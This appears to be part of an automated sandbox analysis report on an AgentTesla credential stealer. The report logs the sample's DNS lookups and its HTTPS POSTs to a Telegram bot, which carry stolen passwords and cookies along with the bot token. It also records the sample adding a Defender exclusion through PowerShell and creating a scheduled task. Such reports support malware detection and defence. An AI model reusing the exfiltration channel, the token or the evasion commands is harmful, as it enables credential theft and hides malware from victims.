                                                      May 14, 2022 08:45:34.569264889 CEST192.168.2.38.8.8.80x6e9eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                      May 14, 2022 08:45:36.502094030 CEST192.168.2.38.8.8.80xfac2Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      May 14, 2022 08:45:34.588376999 CEST8.8.8.8192.168.2.30x6e9eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                      May 14, 2022 08:45:36.519171000 CEST8.8.8.8192.168.2.30xfac2No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                      • api.telegram.org
                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.349739149.154.167.220443C:\Users\user\Desktop\S.O.A18052022.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-05-14 06:45:35 UTC0OUTPOST /bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/sendDocument HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=---------------------------8da3588fbc4d762
                                                      Host: api.telegram.org
                                                      Content-Length: 1032
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      2022-05-14 06:45:35 UTC0INHTTP/1.1 100 Continue
                                                      2022-05-14 06:45:35 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 38 38 66 62 63 34 64 37 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 32 30 36 32 30 31 33 30 35 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 38 38 66 62 63 34 64 37 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 36 33 32 39 32 32 0a 4f 53 46 75 6c 6c
                                                      Data Ascii: -----------------------------8da3588fbc4d762Content-Disposition: form-data; name="chat_id"2062013058-----------------------------8da3588fbc4d762Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/632922OSFull
                                                      2022-05-14 06:45:35 UTC1OUTData Raw: 64 37 36 32 2d 2d 0d 0a
                                                      Data Ascii: d762--
                                                      2022-05-14 06:45:35 UTC1INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Sat, 14 May 2022 06:45:35 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 611
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      {"ok":true,"result":{"message_id":5380,"from":{"id":2043981125,"is_bot":true,"first_name":"KEYYLOGER","username":"sometinbot"},"chat":{"id":2062013058,"first_name":"Micheal","last_name":"John","type":"private"},"date":1652510735,"document":{"file_name":"user-632922 2022-05-14 09-06-08.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIVBGJ_UA95xYc21gcVds6kNPK9yf7IAAJQCwAC_UT5U2gGIpCU4kZDJAQ","file_unique_id":"AgADUAsAAv1E-VM","file_size":462},"caption":"New PW Recovered!\n\nUser Name: user/632922\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.349741149.154.167.220443C:\Users\user\Desktop\S.O.A18052022.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-05-14 06:45:36 UTC2OUTPOST /bot2043981125:AAGaa5K6uc5rV5LARENbXhpoD0InPrKgKJI/sendDocument HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=---------------------------8da3589f2dd8009
                                                      Host: api.telegram.org
                                                      Content-Length: 1895
                                                      Expect: 100-continue
                                                      2022-05-14 06:45:36 UTC2INHTTP/1.1 100 Continue
                                                      2022-05-14 06:45:36 UTC2OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 38 39 66 32 64 64 38 30 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 32 30 36 32 30 31 33 30 35 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 38 39 66 32 64 64 38 30 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 36 33 32 39 32 32 0a 4f 53
                                                      Data Ascii: -----------------------------8da3589f2dd8009Content-Disposition: form-data; name="chat_id"2062013058-----------------------------8da3589f2dd8009Content-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/632922OS
                                                      2022-05-14 06:45:36 UTC3OUTData Raw: 1a 43 6a ef 66 e7 7d 47 8d 18 a4 7a ce 54 89 4c d5 14 c9 2c 50 b3 3e 98 8c 45 3a 93 12 ae 7e 30 61 41 6c cf 51 10 db 53 10 08 d4 38 8b bd 61 1f 87 b4 6c 2f d9 43 77 a5 ad 66 65 25 c7 f4 99 b4 9c 5f 0a b2 98 7f 28 da c9 95 78 3d 1e 6e b8 6e 66 15 65 08 53 ec e8 f8 cb fa b1 73 aa ed 95 11 ed 88 b5 bf 1a 8e b7 be 12 2e e8 58 be 3b 1b e3 91 0d e1 78 17 5e 2f 75 05 f1 fd 61 28 a8 1e a8 72 14 7b 43 9e f9 ba 65 b7 20 8b f6 d5 de db 2f b2 d7 b7 db 8a bc f0 15 12 7e 15 2e 59 37 00 00 00 00 00 00 00 00 00 3c 95 56 f0 7c a8 7c e6 bc 46 d5 33 86 c2 b4 9e 34 91 07 ed 43 17 3d 2b 36 3c e3 e0 7d e5 0f 53 65 1c ef 2f cf 64 14 43 a6 4c 61 39 5a 23 2e 46 f6 fe 7f 12 09 93 c2 0d e1 ca bf fd 5f 00 00 00 00 00 00 00 00 00 b0 20 1f 1f e2 e6 39 05 e0 97 f0 3e 2e ff ec 28 e5 fd
                                                      Data Ascii: Cjf}GzTL,P>E:~0aAlQS8al/Cwfe%_(x=nnfeSs.X;x^/ua(r{Ce /~.Y7<V||F34C=+6<}Se/dCLa9Z#.F_ 9>.(
                                                      2022-05-14 06:45:36 UTC4INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Sat, 14 May 2022 06:45:36 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 621
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      {"ok":true,"result":{"message_id":5381,"from":{"id":2043981125,"is_bot":true,"first_name":"KEYYLOGER","username":"sometinbot"},"chat":{"id":2062013058,"first_name":"Micheal","last_name":"John","type":"private"},"date":1652510736,"document":{"file_name":"user-632922 2022-05-14 09-12-40.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIVBWJ_UBCp7PBkQf4BDwQDUthzDvQaAAJRCwAC_UT5U0vHgMu_PsjeJAQ","file_unique_id":"AgADUQsAAv1E-VM","file_size":1316},"caption":"New Cookie Recovered!\n\nUser Name: user/632922\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:08:45:05
                                                      Start date:14/05/2022
                                                      Path:C:\Users\user\Desktop\S.O.A18052022.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\S.O.A18052022.exe"
                                                      Imagebase:0xc30000
                                                      File size:677888 bytes
                                                      MD5 hash:F2023F2BC7BB270D24F99C9D35D3AD18
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.286263244.00000000040BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.286263244.00000000040BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.284445306.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.286689027.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.286689027.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      Target ID:4
                                                      Start time:08:45:17
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DIPrtjjfjUpyJ.exe
                                                      Imagebase:0x270000
                                                      File size:430592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Target ID:5
                                                      Start time:08:45:17
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:6
                                                      Start time:08:45:17
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DIPrtjjfjUpyJ" /XML "C:\Users\user\AppData\Local\Temp\tmp7211.tmp
                                                      Imagebase:0x1180000
                                                      File size:185856 bytes
                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:7
                                                      Start time:08:45:18
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:8
                                                      Start time:08:45:23
                                                      Start date:14/05/2022
                                                      Path:C:\Users\user\Desktop\S.O.A18052022.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\S.O.A18052022.exe
                                                      Imagebase:0x700000
                                                      File size:677888 bytes
                                                      MD5 hash:F2023F2BC7BB270D24F99C9D35D3AD18
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.280288652.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.280288652.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.503223251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.503223251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.280764938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.280764938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.278325947.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.278325947.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.279240586.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.279240586.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.505430231.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      No disassembly